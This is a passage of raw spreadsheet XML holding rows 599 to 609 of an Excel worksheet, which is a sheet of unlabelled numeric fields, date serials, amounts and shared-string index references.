      <c r="Q599">
        <v>1</v>
      </c>
      <c r="R599">
        <v>1</v>
      </c>
      <c r="S599">
        <v>0</v>
      </c>
      <c r="T599">
        <v>0</v>
      </c>
      <c r="U599">
        <v>500000</v>
      </c>
      <c r="V599">
        <v>0</v>
      </c>
      <c r="W599">
        <v>5000</v>
      </c>
      <c r="X599">
        <v>0</v>
      </c>
      <c r="Y599">
        <v>0</v>
      </c>
      <c r="Z599">
        <v>0</v>
      </c>
      <c r="AA599">
        <v>0</v>
      </c>
      <c r="AB599">
        <v>1000</v>
      </c>
      <c r="AC599">
        <v>1000</v>
      </c>
      <c r="AD599">
        <v>0</v>
      </c>
      <c r="AE599">
        <v>0</v>
      </c>
      <c r="AF599" t="s">
        <v>4759</v>
      </c>
      <c r="AG599">
        <v>23127</v>
      </c>
      <c r="AH599">
        <v>1</v>
      </c>
      <c r="AJ599">
        <v>19</v>
      </c>
      <c r="AK599" t="s">
        <v>4760</v>
      </c>
      <c r="AL599" t="s">
        <v>4761</v>
      </c>
      <c r="AM599" t="s">
        <v>3365</v>
      </c>
      <c r="AN599" t="s">
        <v>68</v>
      </c>
      <c r="AO599">
        <v>2019</v>
      </c>
      <c r="AP599">
        <v>82166911291</v>
      </c>
      <c r="AQ599" t="s">
        <v>4762</v>
      </c>
      <c r="AR599" t="s">
        <v>4759</v>
      </c>
      <c r="AS599" t="s">
        <v>71</v>
      </c>
      <c r="AT599" t="s">
        <v>58</v>
      </c>
      <c r="AU599">
        <v>25</v>
      </c>
      <c r="AV599">
        <v>1</v>
      </c>
      <c r="AW599">
        <v>15</v>
      </c>
      <c r="AX599">
        <v>7</v>
      </c>
      <c r="AY599">
        <v>4</v>
      </c>
      <c r="AZ599">
        <v>5</v>
      </c>
      <c r="BA599" t="s">
        <v>17133</v>
      </c>
      <c r="BB599" t="s">
        <v>15834</v>
      </c>
      <c r="BC599">
        <v>0</v>
      </c>
      <c r="BD599">
        <v>0</v>
      </c>
    </row>
    <row r="600" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A600">
        <v>2522</v>
      </c>
      <c r="B600" t="s">
        <v>4763</v>
      </c>
      <c r="C600" t="s">
        <v>477</v>
      </c>
      <c r="D600" t="s">
        <v>4764</v>
      </c>
      <c r="E600" t="s">
        <v>111</v>
      </c>
      <c r="F600" t="s">
        <v>4765</v>
      </c>
      <c r="G600" s="1">
        <v>44106</v>
      </c>
      <c r="H600">
        <v>230</v>
      </c>
      <c r="I600">
        <v>230</v>
      </c>
      <c r="J600">
        <v>1</v>
      </c>
      <c r="K600">
        <v>2</v>
      </c>
      <c r="L600">
        <v>1</v>
      </c>
      <c r="M600">
        <v>1</v>
      </c>
      <c r="N600">
        <v>0</v>
      </c>
      <c r="O600">
        <v>0</v>
      </c>
      <c r="P600">
        <v>0</v>
      </c>
      <c r="Q600">
        <v>0</v>
      </c>
      <c r="R600">
        <v>10</v>
      </c>
      <c r="S600">
        <v>0</v>
      </c>
      <c r="T600">
        <v>1</v>
      </c>
      <c r="U600">
        <v>100000</v>
      </c>
      <c r="V600">
        <v>6000</v>
      </c>
      <c r="W600">
        <v>5000</v>
      </c>
      <c r="X600">
        <v>6000</v>
      </c>
      <c r="Y600">
        <v>0</v>
      </c>
      <c r="Z600">
        <v>0</v>
      </c>
      <c r="AA600">
        <v>0</v>
      </c>
      <c r="AB600">
        <v>0</v>
      </c>
      <c r="AC600">
        <v>1000</v>
      </c>
      <c r="AD600">
        <v>0</v>
      </c>
      <c r="AE600">
        <v>1000000</v>
      </c>
      <c r="AF600" t="s">
        <v>4766</v>
      </c>
      <c r="AG600">
        <v>95545</v>
      </c>
      <c r="AH600">
        <v>29</v>
      </c>
      <c r="AJ600">
        <v>383</v>
      </c>
      <c r="AK600" t="s">
        <v>1339</v>
      </c>
      <c r="AL600" t="s">
        <v>4767</v>
      </c>
      <c r="AM600" t="s">
        <v>4768</v>
      </c>
      <c r="AN600" t="s">
        <v>55</v>
      </c>
      <c r="AO600">
        <v>2019</v>
      </c>
      <c r="AP600" t="s">
        <v>4769</v>
      </c>
      <c r="AQ600" t="s">
        <v>4770</v>
      </c>
      <c r="AR600" t="s">
        <v>4771</v>
      </c>
      <c r="AS600" t="s">
        <v>71</v>
      </c>
      <c r="AT600" t="s">
        <v>86</v>
      </c>
      <c r="AU600">
        <v>24</v>
      </c>
      <c r="AV600">
        <v>1</v>
      </c>
      <c r="AW600">
        <v>18</v>
      </c>
      <c r="AX600">
        <v>32</v>
      </c>
      <c r="AY600">
        <v>32</v>
      </c>
      <c r="AZ600">
        <v>0</v>
      </c>
      <c r="BA600" t="s">
        <v>17149</v>
      </c>
      <c r="BB600">
        <v>0</v>
      </c>
      <c r="BC600" t="s">
        <v>9854</v>
      </c>
      <c r="BD600" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="601" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A601">
        <v>2126</v>
      </c>
      <c r="B601" t="s">
        <v>4772</v>
      </c>
      <c r="C601" t="s">
        <v>199</v>
      </c>
      <c r="D601" t="s">
        <v>4773</v>
      </c>
      <c r="E601" t="s">
        <v>843</v>
      </c>
      <c r="F601" t="s">
        <v>4774</v>
      </c>
      <c r="G601" s="1">
        <v>43868</v>
      </c>
      <c r="H601">
        <v>256</v>
      </c>
      <c r="I601">
        <v>256</v>
      </c>
      <c r="J601">
        <v>1</v>
      </c>
      <c r="K601">
        <v>1</v>
      </c>
      <c r="L601">
        <v>0</v>
      </c>
      <c r="M601">
        <v>0</v>
      </c>
      <c r="N601">
        <v>0</v>
      </c>
      <c r="O601">
        <v>0</v>
      </c>
      <c r="P601">
        <v>0</v>
      </c>
      <c r="Q601">
        <v>0</v>
      </c>
      <c r="R601">
        <v>1</v>
      </c>
      <c r="S601">
        <v>0</v>
      </c>
      <c r="T601">
        <v>0</v>
      </c>
      <c r="U601">
        <v>2000</v>
      </c>
      <c r="V601">
        <v>2000</v>
      </c>
      <c r="W601">
        <v>0</v>
      </c>
      <c r="X601">
        <v>0</v>
      </c>
      <c r="Y601">
        <v>0</v>
      </c>
      <c r="Z601">
        <v>0</v>
      </c>
      <c r="AA601">
        <v>0</v>
      </c>
      <c r="AB601">
        <v>0</v>
      </c>
      <c r="AC601">
        <v>1000</v>
      </c>
      <c r="AD601">
        <v>0</v>
      </c>
      <c r="AE601">
        <v>0</v>
      </c>
      <c r="AF601" t="s">
        <v>4775</v>
      </c>
      <c r="AG601">
        <v>23127</v>
      </c>
      <c r="AH601">
        <v>1</v>
      </c>
      <c r="AJ601">
        <v>19</v>
      </c>
      <c r="AK601" t="s">
        <v>2558</v>
      </c>
      <c r="AL601" t="s">
        <v>4776</v>
      </c>
      <c r="AM601" t="s">
        <v>4777</v>
      </c>
      <c r="AN601" t="s">
        <v>68</v>
      </c>
      <c r="AO601">
        <v>2019</v>
      </c>
      <c r="AP601">
        <v>81211680820</v>
      </c>
      <c r="AQ601" t="s">
        <v>4778</v>
      </c>
      <c r="AR601" t="s">
        <v>4779</v>
      </c>
      <c r="AU601">
        <v>26</v>
      </c>
      <c r="AV601">
        <v>1</v>
      </c>
      <c r="AW601">
        <v>0</v>
      </c>
      <c r="AX601">
        <v>0</v>
      </c>
      <c r="AY601">
        <v>6</v>
      </c>
      <c r="AZ601">
        <v>1</v>
      </c>
      <c r="BA601" t="s">
        <v>17073</v>
      </c>
      <c r="BB601" t="s">
        <v>14925</v>
      </c>
      <c r="BC601">
        <v>0</v>
      </c>
      <c r="BD601" t="s">
        <v>10158</v>
      </c>
    </row>
    <row r="602" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A602">
        <v>2068</v>
      </c>
      <c r="B602" t="s">
        <v>4780</v>
      </c>
      <c r="C602" t="s">
        <v>157</v>
      </c>
      <c r="D602" t="s">
        <v>4781</v>
      </c>
      <c r="E602" t="s">
        <v>142</v>
      </c>
      <c r="F602" t="s">
        <v>4782</v>
      </c>
      <c r="G602" s="1">
        <v>44095</v>
      </c>
      <c r="H602">
        <v>311</v>
      </c>
      <c r="I602">
        <v>311</v>
      </c>
      <c r="J602">
        <v>1</v>
      </c>
      <c r="K602">
        <v>0</v>
      </c>
      <c r="L602">
        <v>2</v>
      </c>
      <c r="M602">
        <v>0</v>
      </c>
      <c r="N602">
        <v>0</v>
      </c>
      <c r="O602">
        <v>0</v>
      </c>
      <c r="P602">
        <v>0</v>
      </c>
      <c r="Q602">
        <v>1</v>
      </c>
      <c r="R602">
        <v>2</v>
      </c>
      <c r="S602">
        <v>0</v>
      </c>
      <c r="T602">
        <v>0</v>
      </c>
      <c r="U602">
        <v>400000</v>
      </c>
      <c r="V602">
        <v>0</v>
      </c>
      <c r="W602">
        <v>10000</v>
      </c>
      <c r="X602">
        <v>0</v>
      </c>
      <c r="Y602">
        <v>0</v>
      </c>
      <c r="Z602">
        <v>0</v>
      </c>
      <c r="AA602">
        <v>0</v>
      </c>
      <c r="AB602">
        <v>300</v>
      </c>
      <c r="AC602">
        <v>300</v>
      </c>
      <c r="AD602">
        <v>0</v>
      </c>
      <c r="AE602">
        <v>0</v>
      </c>
      <c r="AF602" t="s">
        <v>4783</v>
      </c>
      <c r="AG602">
        <v>61252</v>
      </c>
      <c r="AH602">
        <v>16</v>
      </c>
      <c r="AJ602">
        <v>242</v>
      </c>
      <c r="AK602" t="s">
        <v>706</v>
      </c>
      <c r="AL602" t="s">
        <v>4784</v>
      </c>
      <c r="AM602" t="s">
        <v>4785</v>
      </c>
      <c r="AN602" t="s">
        <v>55</v>
      </c>
      <c r="AO602">
        <v>2017</v>
      </c>
      <c r="AP602">
        <v>8123583402</v>
      </c>
      <c r="AQ602" t="s">
        <v>4786</v>
      </c>
      <c r="AR602" t="s">
        <v>4783</v>
      </c>
      <c r="AU602">
        <v>26</v>
      </c>
      <c r="AV602">
        <v>0</v>
      </c>
      <c r="AW602">
        <v>10</v>
      </c>
      <c r="AX602">
        <v>5</v>
      </c>
      <c r="AY602">
        <v>4</v>
      </c>
      <c r="AZ602">
        <v>2</v>
      </c>
      <c r="BA602" t="s">
        <v>17054</v>
      </c>
      <c r="BB602" t="s">
        <v>15679</v>
      </c>
      <c r="BC602" t="s">
        <v>9869</v>
      </c>
      <c r="BD602" t="s">
        <v>9872</v>
      </c>
    </row>
    <row r="603" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A603">
        <v>2318</v>
      </c>
      <c r="B603" t="s">
        <v>4787</v>
      </c>
      <c r="C603" t="s">
        <v>224</v>
      </c>
      <c r="D603" t="s">
        <v>4788</v>
      </c>
      <c r="E603" t="s">
        <v>528</v>
      </c>
      <c r="F603" t="s">
        <v>4789</v>
      </c>
      <c r="G603" s="1">
        <v>44090</v>
      </c>
      <c r="H603">
        <v>317</v>
      </c>
      <c r="I603">
        <v>317</v>
      </c>
      <c r="J603">
        <v>0</v>
      </c>
      <c r="K603">
        <v>0</v>
      </c>
      <c r="L603">
        <v>0</v>
      </c>
      <c r="M603">
        <v>0</v>
      </c>
      <c r="N603">
        <v>0</v>
      </c>
      <c r="O603">
        <v>0</v>
      </c>
      <c r="P603">
        <v>0</v>
      </c>
      <c r="Q603">
        <v>2</v>
      </c>
      <c r="R603">
        <v>2</v>
      </c>
      <c r="S603">
        <v>0</v>
      </c>
      <c r="T603">
        <v>0</v>
      </c>
      <c r="U603">
        <v>0</v>
      </c>
      <c r="V603">
        <v>0</v>
      </c>
      <c r="W603">
        <v>0</v>
      </c>
      <c r="X603">
        <v>0</v>
      </c>
      <c r="Y603">
        <v>0</v>
      </c>
      <c r="Z603">
        <v>0</v>
      </c>
      <c r="AA603">
        <v>0</v>
      </c>
      <c r="AB603">
        <v>50</v>
      </c>
      <c r="AC603">
        <v>100</v>
      </c>
      <c r="AD603">
        <v>0</v>
      </c>
      <c r="AE603">
        <v>0</v>
      </c>
      <c r="AF603" t="s">
        <v>4790</v>
      </c>
      <c r="AG603">
        <v>55182</v>
      </c>
      <c r="AH603">
        <v>15</v>
      </c>
      <c r="AJ603">
        <v>224</v>
      </c>
      <c r="AK603" t="s">
        <v>4791</v>
      </c>
      <c r="AL603" t="s">
        <v>4792</v>
      </c>
      <c r="AM603" t="s">
        <v>4793</v>
      </c>
      <c r="AN603" t="s">
        <v>68</v>
      </c>
      <c r="AO603">
        <v>2012</v>
      </c>
      <c r="AP603">
        <v>811101951</v>
      </c>
      <c r="AQ603" t="s">
        <v>4794</v>
      </c>
      <c r="AR603" t="s">
        <v>4790</v>
      </c>
      <c r="AS603" t="s">
        <v>71</v>
      </c>
      <c r="AT603" t="s">
        <v>72</v>
      </c>
      <c r="AU603">
        <v>6</v>
      </c>
      <c r="AV603">
        <v>1</v>
      </c>
      <c r="AW603">
        <v>5</v>
      </c>
      <c r="AX603">
        <v>2</v>
      </c>
      <c r="AY603">
        <v>1</v>
      </c>
      <c r="AZ603">
        <v>1</v>
      </c>
      <c r="BA603">
        <v>0</v>
      </c>
      <c r="BB603" t="s">
        <v>15828</v>
      </c>
      <c r="BC603" t="s">
        <v>9865</v>
      </c>
      <c r="BD603">
        <v>0</v>
      </c>
    </row>
    <row r="604" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A604">
        <v>2359</v>
      </c>
      <c r="B604" t="s">
        <v>4795</v>
      </c>
      <c r="C604" t="s">
        <v>157</v>
      </c>
      <c r="D604" t="s">
        <v>4796</v>
      </c>
      <c r="E604" t="s">
        <v>49</v>
      </c>
      <c r="F604" t="s">
        <v>1016</v>
      </c>
      <c r="G604" s="1">
        <v>44369</v>
      </c>
      <c r="H604">
        <v>333</v>
      </c>
      <c r="I604">
        <v>333</v>
      </c>
      <c r="J604">
        <v>0</v>
      </c>
      <c r="K604">
        <v>1</v>
      </c>
      <c r="L604">
        <v>0</v>
      </c>
      <c r="M604">
        <v>0</v>
      </c>
      <c r="N604">
        <v>0</v>
      </c>
      <c r="O604">
        <v>0</v>
      </c>
      <c r="P604">
        <v>0</v>
      </c>
      <c r="Q604">
        <v>1</v>
      </c>
      <c r="R604">
        <v>0</v>
      </c>
      <c r="S604">
        <v>0</v>
      </c>
      <c r="T604">
        <v>0</v>
      </c>
      <c r="U604">
        <v>0</v>
      </c>
      <c r="V604">
        <v>1000</v>
      </c>
      <c r="W604">
        <v>0</v>
      </c>
      <c r="X604">
        <v>0</v>
      </c>
      <c r="Y604">
        <v>0</v>
      </c>
      <c r="Z604">
        <v>0</v>
      </c>
      <c r="AA604">
        <v>0</v>
      </c>
      <c r="AB604">
        <v>500</v>
      </c>
      <c r="AC604">
        <v>0</v>
      </c>
      <c r="AD604">
        <v>0</v>
      </c>
      <c r="AE604">
        <v>0</v>
      </c>
      <c r="AF604" t="s">
        <v>4797</v>
      </c>
      <c r="AG604">
        <v>69321</v>
      </c>
      <c r="AH604">
        <v>16</v>
      </c>
      <c r="AJ604">
        <v>254</v>
      </c>
      <c r="AK604" t="s">
        <v>4798</v>
      </c>
      <c r="AL604" t="s">
        <v>4799</v>
      </c>
      <c r="AM604" t="s">
        <v>4800</v>
      </c>
      <c r="AN604" t="s">
        <v>68</v>
      </c>
      <c r="AO604">
        <v>2007</v>
      </c>
      <c r="AP604">
        <v>817330298</v>
      </c>
      <c r="AQ604" t="s">
        <v>4801</v>
      </c>
      <c r="AR604" t="s">
        <v>4802</v>
      </c>
      <c r="AS604" t="s">
        <v>71</v>
      </c>
      <c r="AT604" t="s">
        <v>72</v>
      </c>
      <c r="AU604">
        <v>0</v>
      </c>
      <c r="AV604">
        <v>0</v>
      </c>
      <c r="AW604">
        <v>5</v>
      </c>
      <c r="AX604">
        <v>42</v>
      </c>
      <c r="AY604">
        <v>2</v>
      </c>
      <c r="AZ604">
        <v>0</v>
      </c>
      <c r="BA604">
        <v>0</v>
      </c>
      <c r="BB604" t="s">
        <v>15849</v>
      </c>
      <c r="BC604">
        <v>0</v>
      </c>
      <c r="BD604" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="605" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A605">
        <v>2345</v>
      </c>
      <c r="B605" t="s">
        <v>4803</v>
      </c>
      <c r="C605" t="s">
        <v>477</v>
      </c>
      <c r="D605" t="s">
        <v>4804</v>
      </c>
      <c r="E605" t="s">
        <v>300</v>
      </c>
      <c r="F605" t="s">
        <v>4805</v>
      </c>
      <c r="G605" s="1">
        <v>43840</v>
      </c>
      <c r="H605">
        <v>388</v>
      </c>
      <c r="I605">
        <v>388</v>
      </c>
      <c r="J605">
        <v>2</v>
      </c>
      <c r="K605">
        <v>3</v>
      </c>
      <c r="L605">
        <v>4</v>
      </c>
      <c r="M605">
        <v>1</v>
      </c>
      <c r="N605">
        <v>0</v>
      </c>
      <c r="O605">
        <v>0</v>
      </c>
      <c r="P605">
        <v>0</v>
      </c>
      <c r="Q605">
        <v>1</v>
      </c>
      <c r="R605">
        <v>20</v>
      </c>
      <c r="S605">
        <v>0</v>
      </c>
      <c r="T605">
        <v>1</v>
      </c>
      <c r="U605">
        <v>50</v>
      </c>
      <c r="V605">
        <v>50</v>
      </c>
      <c r="W605">
        <v>17</v>
      </c>
      <c r="X605">
        <v>1500</v>
      </c>
      <c r="Y605">
        <v>0</v>
      </c>
      <c r="Z605">
        <v>0</v>
      </c>
      <c r="AA605">
        <v>0</v>
      </c>
      <c r="AB605">
        <v>500</v>
      </c>
      <c r="AC605">
        <v>12000</v>
      </c>
      <c r="AD605">
        <v>0</v>
      </c>
      <c r="AE605">
        <v>50000</v>
      </c>
      <c r="AF605" t="s">
        <v>4806</v>
      </c>
      <c r="AG605">
        <v>95526</v>
      </c>
      <c r="AH605">
        <v>29</v>
      </c>
      <c r="AJ605">
        <v>383</v>
      </c>
      <c r="AK605" t="s">
        <v>4807</v>
      </c>
      <c r="AL605" t="s">
        <v>3596</v>
      </c>
      <c r="AM605" t="s">
        <v>4808</v>
      </c>
      <c r="AN605" t="s">
        <v>55</v>
      </c>
      <c r="AO605">
        <v>2019</v>
      </c>
      <c r="AP605">
        <v>8118402082</v>
      </c>
      <c r="AQ605" t="s">
        <v>4809</v>
      </c>
      <c r="AR605" t="s">
        <v>4810</v>
      </c>
      <c r="AS605" t="s">
        <v>71</v>
      </c>
      <c r="AT605" t="s">
        <v>58</v>
      </c>
      <c r="AU605">
        <v>6</v>
      </c>
      <c r="AV605">
        <v>1</v>
      </c>
      <c r="AW605">
        <v>21</v>
      </c>
      <c r="AX605">
        <v>33</v>
      </c>
      <c r="AY605">
        <v>3</v>
      </c>
      <c r="AZ605">
        <v>5</v>
      </c>
      <c r="BA605" t="s">
        <v>17144</v>
      </c>
      <c r="BB605" t="s">
        <v>17143</v>
      </c>
      <c r="BC605">
        <v>0</v>
      </c>
      <c r="BD605">
        <v>0</v>
      </c>
    </row>
    <row r="606" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A606">
        <v>2278</v>
      </c>
      <c r="B606" t="s">
        <v>4811</v>
      </c>
      <c r="C606" t="s">
        <v>199</v>
      </c>
      <c r="D606" t="s">
        <v>4812</v>
      </c>
      <c r="E606" t="s">
        <v>111</v>
      </c>
      <c r="F606" t="s">
        <v>4813</v>
      </c>
      <c r="G606" s="1">
        <v>44039</v>
      </c>
      <c r="H606">
        <v>398</v>
      </c>
      <c r="I606">
        <v>398</v>
      </c>
      <c r="J606">
        <v>1</v>
      </c>
      <c r="K606">
        <v>0</v>
      </c>
      <c r="L606">
        <v>2</v>
      </c>
      <c r="M606">
        <v>0</v>
      </c>
      <c r="N606">
        <v>0</v>
      </c>
      <c r="O606">
        <v>0</v>
      </c>
      <c r="P606">
        <v>0</v>
      </c>
      <c r="Q606">
        <v>0</v>
      </c>
      <c r="R606">
        <v>0</v>
      </c>
      <c r="S606">
        <v>0</v>
      </c>
      <c r="T606">
        <v>0</v>
      </c>
      <c r="U606">
        <v>300</v>
      </c>
      <c r="V606">
        <v>0</v>
      </c>
      <c r="W606">
        <v>5000</v>
      </c>
      <c r="X606">
        <v>0</v>
      </c>
      <c r="Y606">
        <v>0</v>
      </c>
      <c r="Z606">
        <v>0</v>
      </c>
      <c r="AA606">
        <v>0</v>
      </c>
      <c r="AB606">
        <v>0</v>
      </c>
      <c r="AC606">
        <v>0</v>
      </c>
      <c r="AD606">
        <v>0</v>
      </c>
      <c r="AE606">
        <v>0</v>
      </c>
      <c r="AF606" t="s">
        <v>4814</v>
      </c>
      <c r="AG606">
        <v>24476</v>
      </c>
      <c r="AH606">
        <v>1</v>
      </c>
      <c r="AJ606">
        <v>14</v>
      </c>
      <c r="AK606" t="s">
        <v>4815</v>
      </c>
      <c r="AL606" t="s">
        <v>4816</v>
      </c>
      <c r="AM606" t="s">
        <v>4817</v>
      </c>
      <c r="AN606" t="s">
        <v>68</v>
      </c>
      <c r="AO606">
        <v>2018</v>
      </c>
      <c r="AP606">
        <v>8116226465</v>
      </c>
      <c r="AQ606" t="s">
        <v>4818</v>
      </c>
      <c r="AR606" t="s">
        <v>4814</v>
      </c>
      <c r="AU606">
        <v>26</v>
      </c>
      <c r="AV606">
        <v>1</v>
      </c>
      <c r="AW606">
        <v>12</v>
      </c>
      <c r="AX606">
        <v>15</v>
      </c>
      <c r="AY606">
        <v>11</v>
      </c>
      <c r="AZ606">
        <v>19</v>
      </c>
      <c r="BA606" t="s">
        <v>17113</v>
      </c>
      <c r="BB606" t="s">
        <v>15802</v>
      </c>
      <c r="BC606" t="s">
        <v>10559</v>
      </c>
      <c r="BD606" t="s">
        <v>10556</v>
      </c>
    </row>
    <row r="607" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A607">
        <v>1971</v>
      </c>
      <c r="B607" t="s">
        <v>4819</v>
      </c>
      <c r="C607" t="s">
        <v>318</v>
      </c>
      <c r="D607" t="s">
        <v>4820</v>
      </c>
      <c r="E607" t="s">
        <v>363</v>
      </c>
      <c r="F607" t="s">
        <v>3499</v>
      </c>
      <c r="G607" s="1">
        <v>43847</v>
      </c>
      <c r="H607">
        <v>404</v>
      </c>
      <c r="I607">
        <v>404</v>
      </c>
      <c r="J607">
        <v>0</v>
      </c>
      <c r="K607">
        <v>0</v>
      </c>
      <c r="L607">
        <v>0</v>
      </c>
      <c r="M607">
        <v>0</v>
      </c>
      <c r="N607">
        <v>0</v>
      </c>
      <c r="O607">
        <v>0</v>
      </c>
      <c r="P607">
        <v>0</v>
      </c>
      <c r="Q607">
        <v>0</v>
      </c>
      <c r="R607">
        <v>0</v>
      </c>
      <c r="S607">
        <v>0</v>
      </c>
      <c r="T607">
        <v>1</v>
      </c>
      <c r="U607">
        <v>0</v>
      </c>
      <c r="V607">
        <v>0</v>
      </c>
      <c r="W607">
        <v>0</v>
      </c>
      <c r="X607">
        <v>0</v>
      </c>
      <c r="Y607">
        <v>0</v>
      </c>
      <c r="Z607">
        <v>0</v>
      </c>
      <c r="AA607">
        <v>0</v>
      </c>
      <c r="AB607">
        <v>0</v>
      </c>
      <c r="AC607">
        <v>0</v>
      </c>
      <c r="AD607">
        <v>0</v>
      </c>
      <c r="AE607">
        <v>20</v>
      </c>
      <c r="AF607" t="s">
        <v>4821</v>
      </c>
      <c r="AG607">
        <v>92255</v>
      </c>
      <c r="AH607">
        <v>26</v>
      </c>
      <c r="AJ607">
        <v>403</v>
      </c>
      <c r="AK607" t="s">
        <v>2255</v>
      </c>
      <c r="AL607" t="s">
        <v>4822</v>
      </c>
      <c r="AM607" t="s">
        <v>4823</v>
      </c>
      <c r="AN607" t="s">
        <v>68</v>
      </c>
      <c r="AO607">
        <v>2013</v>
      </c>
      <c r="AP607">
        <v>81241333359</v>
      </c>
      <c r="AQ607" t="s">
        <v>4824</v>
      </c>
      <c r="AR607" t="s">
        <v>4821</v>
      </c>
      <c r="AU607">
        <v>26</v>
      </c>
      <c r="AV607">
        <v>0</v>
      </c>
      <c r="AW607">
        <v>0</v>
      </c>
      <c r="AX607">
        <v>0</v>
      </c>
      <c r="AY607">
        <v>2</v>
      </c>
      <c r="AZ607">
        <v>2</v>
      </c>
      <c r="BA607" t="s">
        <v>17035</v>
      </c>
      <c r="BB607" t="s">
        <v>15620</v>
      </c>
      <c r="BC607">
        <v>0</v>
      </c>
      <c r="BD607" t="s">
        <v>9909</v>
      </c>
    </row>
    <row r="608" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A608">
        <v>2362</v>
      </c>
      <c r="B608" t="s">
        <v>4825</v>
      </c>
      <c r="C608" t="s">
        <v>157</v>
      </c>
      <c r="D608" t="s">
        <v>4826</v>
      </c>
      <c r="E608" t="s">
        <v>142</v>
      </c>
      <c r="F608" t="s">
        <v>4827</v>
      </c>
      <c r="G608" s="1">
        <v>43878</v>
      </c>
      <c r="H608">
        <v>439</v>
      </c>
      <c r="I608">
        <v>439</v>
      </c>
      <c r="J608">
        <v>2</v>
      </c>
      <c r="K608">
        <v>0</v>
      </c>
      <c r="L608">
        <v>1</v>
      </c>
      <c r="M608">
        <v>1</v>
      </c>
      <c r="N608">
        <v>0</v>
      </c>
      <c r="O608">
        <v>0</v>
      </c>
      <c r="P608">
        <v>0</v>
      </c>
      <c r="Q608">
        <v>4</v>
      </c>
      <c r="R608">
        <v>18</v>
      </c>
      <c r="S608">
        <v>0</v>
      </c>
      <c r="T608">
        <v>1</v>
      </c>
      <c r="U608">
        <v>60000</v>
      </c>
      <c r="V608">
        <v>0</v>
      </c>
      <c r="W608">
        <v>3000</v>
      </c>
      <c r="X608">
        <v>400</v>
      </c>
      <c r="Y608">
        <v>0</v>
      </c>
      <c r="Z608">
        <v>0</v>
      </c>
      <c r="AA608">
        <v>0</v>
      </c>
      <c r="AB608">
        <v>200</v>
      </c>
      <c r="AC608">
        <v>5400</v>
      </c>
      <c r="AD608">
        <v>0</v>
      </c>
      <c r="AE608">
        <v>26000</v>
      </c>
      <c r="AF608" t="s">
        <v>4828</v>
      </c>
      <c r="AG608">
        <v>61252</v>
      </c>
      <c r="AH608">
        <v>16</v>
      </c>
      <c r="AJ608">
        <v>242</v>
      </c>
      <c r="AK608" t="s">
        <v>706</v>
      </c>
      <c r="AL608" t="s">
        <v>4829</v>
      </c>
      <c r="AM608" t="s">
        <v>4830</v>
      </c>
      <c r="AN608" t="s">
        <v>55</v>
      </c>
      <c r="AO608">
        <v>2017</v>
      </c>
      <c r="AP608" t="s">
        <v>4831</v>
      </c>
      <c r="AQ608" t="s">
        <v>4832</v>
      </c>
      <c r="AR608" t="s">
        <v>4833</v>
      </c>
      <c r="AU608">
        <v>26</v>
      </c>
      <c r="AV608">
        <v>1</v>
      </c>
      <c r="AW608">
        <v>6</v>
      </c>
      <c r="AX608">
        <v>42</v>
      </c>
      <c r="AY608">
        <v>2</v>
      </c>
      <c r="AZ608">
        <v>3</v>
      </c>
      <c r="BA608" t="s">
        <v>17153</v>
      </c>
      <c r="BB608" t="s">
        <v>15850</v>
      </c>
      <c r="BC608">
        <v>0</v>
      </c>
      <c r="BD608" t="s">
        <v>9889</v>
      </c>
    </row>
    <row r="609" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A609">
        <v>2344</v>
      </c>
      <c r="B609" t="s">
        <v>4834</v>
      </c>
      <c r="C609" t="s">
        <v>318</v>
      </c>
      <c r="D609" t="s">
        <v>4835</v>
      </c>
      <c r="E609" t="s">
        <v>49</v>
      </c>
      <c r="F609" t="s">
        <v>364</v>
      </c>
      <c r="G609" s="1">
        <v>43881</v>
      </c>
      <c r="H609">
        <v>446</v>
      </c>
      <c r="I609">
        <v>446</v>
      </c>
      <c r="J609">
        <v>0</v>
      </c>
      <c r="K609">
        <v>0</v>
      </c>
      <c r="L609">
        <v>0</v>
      </c>
      <c r="M609">
        <v>0</v>
      </c>
      <c r="N609">
        <v>0</v>
      </c>
      <c r="O609">
        <v>0</v>
      </c>
      <c r="P609">
        <v>0</v>
      </c>
      <c r="Q609">
        <v>0</v>
      </c>
      <c r="R609">
        <v>0</v>
      </c>
      <c r="S609">
        <v>0</v>
      </c>
      <c r="T609">
        <v>1</v>
      </c>
      <c r="U609">
        <v>0</v>
      </c>
      <c r="V609">
        <v>0</v>
      </c>
      <c r="W609">
        <v>0</v>
      </c>
      <c r="X609">
        <v>0</v>
      </c>
      <c r="Y609">
        <v>0</v>
      </c>
      <c r="Z609">
        <v>0</v>
      </c>
      <c r="AA609">
        <v>0</v>
      </c>
      <c r="AB609">
        <v>0</v>
      </c>
      <c r="AC609">
        <v>0</v>
      </c>
      <c r="AD609">
        <v>0</v>
      </c>
      <c r="AE609">
        <v>500000</v>
      </c>
      <c r="AF609" t="s">
        <v>4836</v>
      </c>
      <c r="AG609">
        <v>90241</v>
      </c>
      <c r="AH609">
        <v>26</v>
      </c>
      <c r="AJ609">
        <v>420</v>
      </c>
      <c r="AK609" t="s">
        <v>331</v>
      </c>
      <c r="AL609" t="s">
        <v>4837</v>
      </c>
      <c r="AM609" t="s">
        <v>4838</v>
      </c>
      <c r="AN609" t="s">
        <v>55</v>
      </c>
      <c r="AO609">
        <v>2010</v>
      </c>
      <c r="AP609" t="s">
        <v>4839</v>
      </c>
      <c r="AQ609" t="s">
        <v>4840</v>
      </c>
      <c r="AR609" t="s">
        <v>4836</v>
      </c>
      <c r="AS609" t="s">
        <v>371</v>
      </c>
      <c r="AT609" t="s">
        <v>58</v>
      </c>
      <c r="AU609">
        <v>0</v>
      </c>
      <c r="AV609">
        <v>0</v>
      </c>
      <c r="AW609">
        <v>10</v>
      </c>
      <c r="AX609">
        <v>10</v>
      </c>
      <c r="AY609">
        <v>2</v>
      </c>
      <c r="AZ609">
        <v>3</v>
      </c>
      <c r="BA609" t="s">
        <v>17142</v>
      </c>
      <c r="BB609" t="s">
        <v>15843</v>
      </c>
      <c r="BC609" t="s">
        <v>9506</v>
      </c>
      <c r="BD609" t="s">
        <v>9894</v>
      </c>
    </row>
